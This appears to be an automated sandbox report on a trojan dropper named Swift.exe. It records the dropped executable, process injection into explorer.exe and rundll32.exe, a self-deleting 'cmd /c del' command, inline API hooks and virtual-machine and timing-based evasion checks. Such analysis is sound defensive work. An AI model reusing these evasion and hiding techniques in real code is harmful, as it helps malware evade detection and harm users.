File read: C:\Users\user\Desktop\Swift.exe

Jump to behavior

Source: Swift.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Swift.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Swift.exe C:\Users\user\Desktop\Swift.exe
Source: C:\Users\user\Desktop\Swift.exe	Process created: C:\Users\user\AppData\Local\Temp\idxgunu.exe "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Process created: C:\Users\user\AppData\Local\Temp\idxgunu.exe "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idxgunu.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Swift.exe	Process created: C:\Users\user\AppData\Local\Temp\idxgunu.exe "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Process created: C:\Users\user\AppData\Local\Temp\idxgunu.exe "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idxgunu.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Swift.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Swift.exe

File created: C:\Users\user\AppData\Local\Temp\nsk8B0.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/3@8/6

Source: C:\Users\user\Desktop\Swift.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\Swift.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Swift.exe

Code function: 0_2_0040427F GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040427F

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: idxgunu.exe, 00000001.00000003.305903076.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, idxgunu.exe, 00000001.00000003.308532987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000002.398628983.00000000013EF000.00000040.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000003.308766308.0000000000D93000.00000004.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000003.310543467.0000000000F39000.00000004.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.396614059.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.398534119.0000000004DBA000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: idxgunu.exe, idxgunu.exe, 00000003.00000002.398628983.00000000013EF000.00000040.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000003.308766308.0000000000D93000.00000004.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000003.310543467.0000000000F39000.00000004.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.396614059.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.398534119.0000000004DBA000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: idxgunu.exe, 00000003.00000002.397197775.00000000012A0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: idxgunu.exe, 00000003.00000002.397197775.00000000012A0000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041D05E push cs; ret	3_2_0041D05F
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041681D push 99159BFBh; iretd	3_2_00416822
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_00417829 push esp; retf	3_2_0041782A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_00416C89 push es; ret	3_2_00416C9A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041D4B5 push eax; ret	3_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041D56C push eax; ret	3_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041D502 push eax; ret	3_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041D50B push eax; ret	3_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0040674B push esi; iretd	3_2_0040674D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0134D0D1 push ecx; ret	3_2_0134D0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FCD0D1 push ecx; ret	5_2_04FCD0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105681D push 99159BFBh; iretd	5_2_01056822
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01057829 push esp; retf	5_2_0105782A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105D05E push cs; ret	5_2_0105D05F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105D502 push eax; ret	5_2_0105D508
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105D50B push eax; ret	5_2_0105D572
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105D56C push eax; ret	5_2_0105D572
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01056C89 push es; ret	5_2_01056C9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105D4B5 push eax; ret	5_2_0105D508
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0104674B push esi; iretd	5_2_0104674D

Source: C:\Users\user\Desktop\Swift.exe

File created: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xEB

Source: C:\Users\user\Desktop\Swift.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-489

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000001049904 second address: 000000000104990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000001049B7E second address: 0000000001049B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe TID: 3156	Thread sleep count: 64 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 3156	Thread sleep time: -128000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Code function: 3_2_00409AB0 rdtsc

3_2_00409AB0

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	API coverage: 7.9 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 9.2 %

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Swift.exe	Code function: 0_2_00405E80 FindFirstFileA,FindClose,	0_2_00405E80
Source: C:\Users\user\Desktop\Swift.exe	Code function: 0_2_004054AA DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004054AA
Source: C:\Users\user\Desktop\Swift.exe	Code function: 0_2_00402654 FindFirstFileA,	0_2_00402654

Source: C:\Users\user\Desktop\Swift.exe

API call chain: ExitProcess graph end node

graph_0-3048

Source: explorer.exe, 00000004.00000000.325843956.000000000834F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000004.00000000.325655441.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.319209466.00000000059F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000004.00000000.382343601.0000000008394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.384259358.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000004.00000000.325655441.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: explorer.exe, 00000004.00000000.360215600.00000000085A9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Code function: 3_2_00409AB0 rdtsc

3_2_00409AB0

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 1_2_01420005 mov eax, dword ptr fs:[00000030h]	1_2_01420005
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 1_2_01420149 mov eax, dword ptr fs:[00000030h]	1_2_01420149
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 1_2_01420019 mov eax, dword ptr fs:[00000030h]	1_2_01420019
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 1_2_0142007A mov eax, dword ptr fs:[00000030h]	1_2_0142007A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132513A mov eax, dword ptr fs:[00000030h]	3_2_0132513A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132513A mov eax, dword ptr fs:[00000030h]	3_2_0132513A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01314120 mov eax, dword ptr fs:[00000030h]	3_2_01314120
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01314120 mov eax, dword ptr fs:[00000030h]	3_2_01314120
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01314120 mov eax, dword ptr fs:[00000030h]	3_2_01314120
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01314120 mov eax, dword ptr fs:[00000030h]	3_2_01314120
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01314120 mov ecx, dword ptr fs:[00000030h]	3_2_01314120
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F9100 mov eax, dword ptr fs:[00000030h]	3_2_012F9100
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F9100 mov eax, dword ptr fs:[00000030h]	3_2_012F9100
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F9100 mov eax, dword ptr fs:[00000030h]	3_2_012F9100
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FC962 mov eax, dword ptr fs:[00000030h]	3_2_012FC962
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FB171 mov eax, dword ptr fs:[00000030h]	3_2_012FB171
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FB171 mov eax, dword ptr fs:[00000030h]	3_2_012FB171
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131B944 mov eax, dword ptr fs:[00000030h]	3_2_0131B944
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131B944 mov eax, dword ptr fs:[00000030h]	3_2_0131B944
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013751BE mov eax, dword ptr fs:[00000030h]	3_2_013751BE
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013751BE mov eax, dword ptr fs:[00000030h]	3_2_013751BE
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013751BE mov eax, dword ptr fs:[00000030h]	3_2_013751BE
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013751BE mov eax, dword ptr fs:[00000030h]	3_2_013751BE
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013769A6 mov eax, dword ptr fs:[00000030h]	3_2_013769A6
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013261A0 mov eax, dword ptr fs:[00000030h]	3_2_013261A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013261A0 mov eax, dword ptr fs:[00000030h]	3_2_013261A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01322990 mov eax, dword ptr fs:[00000030h]	3_2_01322990
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131C182 mov eax, dword ptr fs:[00000030h]	3_2_0131C182
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132A185 mov eax, dword ptr fs:[00000030h]	3_2_0132A185
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FB1E1 mov eax, dword ptr fs:[00000030h]	3_2_012FB1E1
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FB1E1 mov eax, dword ptr fs:[00000030h]	3_2_012FB1E1
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FB1E1 mov eax, dword ptr fs:[00000030h]	3_2_012FB1E1
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013841E8 mov eax, dword ptr fs:[00000030h]	3_2_013841E8
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130B02A mov eax, dword ptr fs:[00000030h]	3_2_0130B02A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130B02A mov eax, dword ptr fs:[00000030h]	3_2_0130B02A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130B02A mov eax, dword ptr fs:[00000030h]	3_2_0130B02A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130B02A mov eax, dword ptr fs:[00000030h]	3_2_0130B02A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132002D mov eax, dword ptr fs:[00000030h]	3_2_0132002D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132002D mov eax, dword ptr fs:[00000030h]	3_2_0132002D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132002D mov eax, dword ptr fs:[00000030h]	3_2_0132002D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132002D mov eax, dword ptr fs:[00000030h]	3_2_0132002D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132002D mov eax, dword ptr fs:[00000030h]	3_2_0132002D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01377016 mov eax, dword ptr fs:[00000030h]	3_2_01377016
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01377016 mov eax, dword ptr fs:[00000030h]	3_2_01377016
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01377016 mov eax, dword ptr fs:[00000030h]	3_2_01377016
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C4015 mov eax, dword ptr fs:[00000030h]	3_2_013C4015
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C4015 mov eax, dword ptr fs:[00000030h]	3_2_013C4015
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B2073 mov eax, dword ptr fs:[00000030h]	3_2_013B2073
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C1074 mov eax, dword ptr fs:[00000030h]	3_2_013C1074
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01310050 mov eax, dword ptr fs:[00000030h]	3_2_01310050
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01310050 mov eax, dword ptr fs:[00000030h]	3_2_01310050
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132F0BF mov ecx, dword ptr fs:[00000030h]	3_2_0132F0BF
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132F0BF mov eax, dword ptr fs:[00000030h]	3_2_0132F0BF
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132F0BF mov eax, dword ptr fs:[00000030h]	3_2_0132F0BF
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013220A0 mov eax, dword ptr fs:[00000030h]	3_2_013220A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013220A0 mov eax, dword ptr fs:[00000030h]	3_2_013220A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013220A0 mov eax, dword ptr fs:[00000030h]	3_2_013220A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013220A0 mov eax, dword ptr fs:[00000030h]	3_2_013220A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013220A0 mov eax, dword ptr fs:[00000030h]	3_2_013220A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013220A0 mov eax, dword ptr fs:[00000030h]	3_2_013220A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013390AF mov eax, dword ptr fs:[00000030h]	3_2_013390AF
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F9080 mov eax, dword ptr fs:[00000030h]	3_2_012F9080
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01373884 mov eax, dword ptr fs:[00000030h]	3_2_01373884
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01373884 mov eax, dword ptr fs:[00000030h]	3_2_01373884
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F58EC mov eax, dword ptr fs:[00000030h]	3_2_012F58EC
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0138B8D0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138B8D0 mov ecx, dword ptr fs:[00000030h]	3_2_0138B8D0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0138B8D0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0138B8D0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0138B8D0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0138B8D0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B131B mov eax, dword ptr fs:[00000030h]	3_2_013B131B
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01323B7A mov eax, dword ptr fs:[00000030h]	3_2_01323B7A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01323B7A mov eax, dword ptr fs:[00000030h]	3_2_01323B7A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FDB60 mov ecx, dword ptr fs:[00000030h]	3_2_012FDB60
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C8B58 mov eax, dword ptr fs:[00000030h]	3_2_013C8B58
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FDB40 mov eax, dword ptr fs:[00000030h]	3_2_012FDB40
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FF358 mov eax, dword ptr fs:[00000030h]	3_2_012FF358
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C5BA5 mov eax, dword ptr fs:[00000030h]	3_2_013C5BA5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01324BAD mov eax, dword ptr fs:[00000030h]	3_2_01324BAD
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01324BAD mov eax, dword ptr fs:[00000030h]	3_2_01324BAD
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01324BAD mov eax, dword ptr fs:[00000030h]	3_2_01324BAD
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132B390 mov eax, dword ptr fs:[00000030h]	3_2_0132B390
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01322397 mov eax, dword ptr fs:[00000030h]	3_2_01322397
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B138A mov eax, dword ptr fs:[00000030h]	3_2_013B138A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013AD380 mov ecx, dword ptr fs:[00000030h]	3_2_013AD380
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01301B8F mov eax, dword ptr fs:[00000030h]	3_2_01301B8F
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01301B8F mov eax, dword ptr fs:[00000030h]	3_2_01301B8F
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013203E2 mov eax, dword ptr fs:[00000030h]	3_2_013203E2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013203E2 mov eax, dword ptr fs:[00000030h]	3_2_013203E2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013203E2 mov eax, dword ptr fs:[00000030h]	3_2_013203E2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013203E2 mov eax, dword ptr fs:[00000030h]	3_2_013203E2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013203E2 mov eax, dword ptr fs:[00000030h]	3_2_013203E2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013203E2 mov eax, dword ptr fs:[00000030h]	3_2_013203E2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131DBE9 mov eax, dword ptr fs:[00000030h]	3_2_0131DBE9
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013753CA mov eax, dword ptr fs:[00000030h]	3_2_013753CA
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013753CA mov eax, dword ptr fs:[00000030h]	3_2_013753CA
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01334A2C mov eax, dword ptr fs:[00000030h]	3_2_01334A2C
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01334A2C mov eax, dword ptr fs:[00000030h]	3_2_01334A2C
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01313A1C mov eax, dword ptr fs:[00000030h]	3_2_01313A1C
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BAA16 mov eax, dword ptr fs:[00000030h]	3_2_013BAA16
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BAA16 mov eax, dword ptr fs:[00000030h]	3_2_013BAA16
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FAA16 mov eax, dword ptr fs:[00000030h]	3_2_012FAA16
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FAA16 mov eax, dword ptr fs:[00000030h]	3_2_012FAA16
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01308A0A mov eax, dword ptr fs:[00000030h]	3_2_01308A0A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F5210 mov eax, dword ptr fs:[00000030h]	3_2_012F5210
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F5210 mov ecx, dword ptr fs:[00000030h]	3_2_012F5210
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F5210 mov eax, dword ptr fs:[00000030h]	3_2_012F5210
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F5210 mov eax, dword ptr fs:[00000030h]	3_2_012F5210
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0133927A mov eax, dword ptr fs:[00000030h]	3_2_0133927A
